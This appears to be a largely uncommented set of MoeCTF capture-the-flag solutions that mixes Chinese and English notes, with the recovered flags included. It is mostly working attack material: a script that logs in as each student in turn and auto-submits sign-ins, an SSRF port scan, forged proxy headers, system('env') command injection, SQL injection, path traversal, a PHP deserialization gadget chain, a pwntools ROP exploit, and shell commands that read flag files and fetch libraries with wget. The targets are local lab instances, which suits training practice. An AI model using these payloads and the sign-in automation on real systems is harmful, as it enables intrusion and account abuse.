self.aes = AES.new(self.key, model_func) # 创建一个aes对象
elif self.model == 'CBC':
self.aes = AES.new(self.key, model_func, self.iv) # 创建一个aes对象
def add_16(self, par):
par = par.encode(self.encode_)
while len(par) % 16 != 0:
par += b'\x00'
return par
def pkcs7padding(self, text):
x = self.BLOCK_SIZE_16 - (len(text) % self.BLOCK_SIZE_16)
if x != 0:
text = text + chr(x) * x
return text
def encrypt(self, text, key, model, iv='', encode_='utf-8', out_type="base64", padding="zero0"):
self.init_aes(encode_, model, iv, key)
if padding == "pkcs7":
text = self.pkcs7padding(text)
text = self.add_16(text)
buff = self.aes.encrypt(text)
result = base64.encodebytes(buff).decode().strip()
if out_type == "hex":
result = str(binascii.hexlify(buff), encoding='utf-8')
return result
def decrypt(self, text, key, model, iv='', encode_='utf-8'):
text = base64.decodebytes(text.encode(self.encode_))
self.init_aes(encode_, model, iv, key)
return self.aes.decrypt(text).decode(self.encode_).strip('\0').replace("\x05", '').replace("\x06", '').replace(
"\x07", '')
def login(pwd):
import requests
burp0_url = "http://127.0.0.1:10156/fanyalogin"
burp0_data = {"fid": "-1", "uname": pwd, "password": pwd,
"refer": "https%3A%2F%2Fi.chaoxing.com", "t": "true", "forbidotherlogin": "0", "validate": '',
"doubleFactorLogin": "0", "independentId": "0", "independentNameId": "0"}
res = session.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
burp0_cookies['token'] = res.cookies['token']
# F9RbghmuxtrFEC7gxyLzkQ
def getQR():
burp0_url = "http://127.0.0.1:10156/v2/apis/sign/refreshQRCode?activeId=4000000000000&time=&viewFrom=&viceScreen=0&viceScreenEwmEnc="
res = session.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
json_res = json.loads(res.text)
print(json_res)
return json_res['data']
def sign(json_res):
burp0_url = "http://127.0.0.1:10156/widget/sign/e?id=4000000000000&c=" + json_res['signCode'] + "&enc=" + json_res[
'enc'] + "&DB_STRATEGY=PRIMARY_KEY&STRATEGY_PARA=id"
res = session.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
# print(res.text)
session.close()
if __name__ == '__main__':
for stu in tqdm(get_names()):
# sleep(0.1)
aes = AESUtil()
# _text = aes.encrypt("1524075", "u2oh6Vu^HWe4_AES", "ECB", padding="pcks7")
_text = aes.encrypt(stu, "u2oh6Vu^HWe4_AES", "CBC", "u2oh6Vu^HWe4_AES", padding="pkcs7")
# print(_text)
login(_text)
sign(getQR())
ImageCloud
import requests
for port in range(5280, 6000):
url = f'http://127.0.0.1:50319/image?url=http://localhost:{port}/image/flag.jpg'
res = requests.get(url)
print(f'{port=}, {res.text}')
if 'JFIF' in res.text:
exit(0)
moectf{cETtEbRat3-yOU_4Tt4ck-to_My_Tm@G3-ct0udHHHhHH140}
ez_http
POST /?xt=%E5%A4%A7%E5%B8%85b HTTP/1.1
Host: 127.0.0.1:14304
sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: MoeDedicatedBrowser
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Referer: https://www.xidian.edu.cn/
cookie: user=admin
X-Forwarded-For:127.0.0.1
X-Forwarded:127.0.0.1
Forwarded-For:127.0.0.1
Forwarded:127.0.0.1
X-Forwarded-Host:127.0.0.1
X-remote-IP:127.0.0.1
X-remote-addr:127.0.0.1
True-Client-IP:127.0.0.1
X-Client-IP:127.0.0.1
Client-IP:127.0.0.1
X-Real-IP:127.0.0.1
Ali-CDN-Real-IP:127.0.0.1
Cdn-Src-Ip:127.0.0.1
Cdn-Real-Ip:127.0.0.1
CF-Connecting-IP:127.0.0.1
X-Cluster-Client-IP:127.0.0.1
WL-Proxy-Client-IP:127.0.0.1
Proxy-Client-IP:127.0.0.1
Fastly-Client-Ip:127.0.0.1
True-Client-Ip:127.0.0.1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 8
imoau=sb
ProveYourLove
发包300次
POST /questionnaire HTTP/1.1
Host: 127.0.0.1:5687
Content-Length: 107
sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://127.0.0.1:5687
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:5687/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: verify=user; PHPSESSID=8d5643dbf3b034504b084eb45740b2b2; session=eyJjb2luIjpbMl0sImNvaW5fY291bnQiOjEsInBsYXllciI6ImQiLCJyb3VuZCI6LTEsInRpbWUiOjE3MjQwNDQ2MzMuMDIyNzEyfQ.ZsLVXg.7jD-C1iXRqEOkSkx-uSRx39LWgc; retainlogin=1; token=ad234ea9-bbc1-416d-b2f5-2bb3afb86e38; __wzd5cc1c8e9ac487aaec440=1724385077|00730c0a3b30
Connection: close
{"nickname":"1","user_gender":"male","target":"1","target_gender":"male","message":"§1§","anonymous":"false"}
flag: moectf{CoNgrAtULAtlOn5_ON-bEC0MING_A_1ICK1NG_dOG77}
Qixi_flag: moeCTF{Happy_Chin3s3_Va13ntin3's_Day,_Baby.}
静态网页
POST /final1l1l_challenge.php?a=a HTTP/1.1
Host: 127.0.0.1:12982
sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: verify=user; PHPSESSID=8d5643dbf3b034504b084eb45740b2b2; session=eyJjb2luIjpbMl0sImNvaW5fY291bnQiOjEsInBsYXllciI6ImQiLCJyb3VuZCI6LTEsInRpbWUiOjE3MjQwNDQ2MzMuMDIyNzEyfQ.ZsLVXg.7jD-C1iXRqEOkSkx-uSRx39LWgc; retainlogin=1; token=ad234ea9-bbc1-416d-b2f5-2bb3afb86e38; __wzd5cc1c8e9ac487aaec440=1724385077|00730c0a3b30; __wzd30287248c4b7b7137545=1724401549|03b8e06b5b8f
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
b[a]=0cc175b9c0f1b6a831c399e269772661
垫刀之路01: MoeCTF?启动!
env
垫刀之路02: 普通的文件上传
as=system('env')%3b
垫刀之路03图床
as=system('env')%3b
垫刀之路05: 登陆网站
admin123' #
垫刀之路04: 一个文件浏览器
http://127.0.0.1:1338/?path=/src/../../../../../../../../../../../../tmp/flag
垫刀之路06: pop base mini moe
<?php
class A {
// 注意 private 属性的序列化哦
private $evil='env';
// 如何赋值呢
public $a; # private
function __destruct() {
$s = $this->a;
$s($this->evil);
}
}
class B {
private $b='system';
function __invoke($c) {
echo("\n");
echo $c;
echo("\n");
echo("\n");
echo $this->b;
echo("\n");
$s = $this->b;
$s($c);
}
}
$s = new A();
$s->a=new B();
$data = serialize($s);
echo("\n");
echo $data;
echo("\n");
echo urlencode($data);
echo("\n");
unserialize($data);
垫刀之路07: 泄漏的密码
import os
os.popen("cat flag").read()
PWN
二进制漏洞审计入门指北
nc ip:port
moectf{Welcome_to_the_journey_of_Pwn}
nomoreno_more_gets
栈溢出
from pwn import *
binary = './lockedshell'
padding = 80
pad = 8
elf = ELF(binary)
context(log_level='debug', arch=elf.arch, os='linux', binary=binary)
s = remote('127.0.0.1', 45073)
ret = ROP(elf).find_gadget(['ret'])[0]
p = flat(b'a' * (padding + pad), ret, 0x000401176)
s.sendline(p)
s.interactive()
Week1
re
tea
# 如果超过8字节 2个一组处理
from Crypto.Util.number import long_to_bytes
def decrypt(v, k):
v0, v1 = v
delta = 0x9E3779B9
# x = sum(delta for _ in range(32)) & 0xFFFFFFFF
x = delta * 32 & 0xffffffff
k0, k1, k2, k3 = k
for i in range(32):
v1 -= ((v0 << 4) + k2) ^ (v0 + x) ^ ((v0 >> 5) + k3)
v1 = v1 & 0xFFFFFFFF
v0 -= ((v1 << 4) + k0) ^ (v1 + x) ^ ((v1 >> 5) + k1)
v0 = v0 & 0xFFFFFFFF
x -= delta
x = x & 0xFFFFFFFF
return [v0, v1]
if __name__ == '__main__':
import struct
key = [0x65736162, 0x6F783436, 0x61657472, 0x61657478]
values = [676078132, 957400408]
v = decrypt(values, key)
print(long_to_bytes(v[0]).hex())
print(long_to_bytes(v[1]).hex())
# 提交的是16进制
# moectf{836153a5-8e00-49bd-9c42-caf30620caaf}
运维题
echo "$(</flag.txt)"
# https://www.busybox.net/downloads/binaries/1.35.0-x86_64-linux-musl/
# 下载wget http chmod
# 16进制覆盖进程
# 邻居机libc开下载
./busybox_HTTPD -p 8080 -h ./
# 损坏机
printf '\x7F\x45\x4C\x46\x02...'> chmod
...
wget http://127.0.0.1:8080/ld-linux-x86-64.so.2
wget http://127.0.0.1:8080/x86_64-linux-gnu/libc.so.6
chmod 777 /lib/x86_64-linux-gnu/libc.so.6
chmod 777 /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2
service nginx start
cat /var/log/nginx/access.log
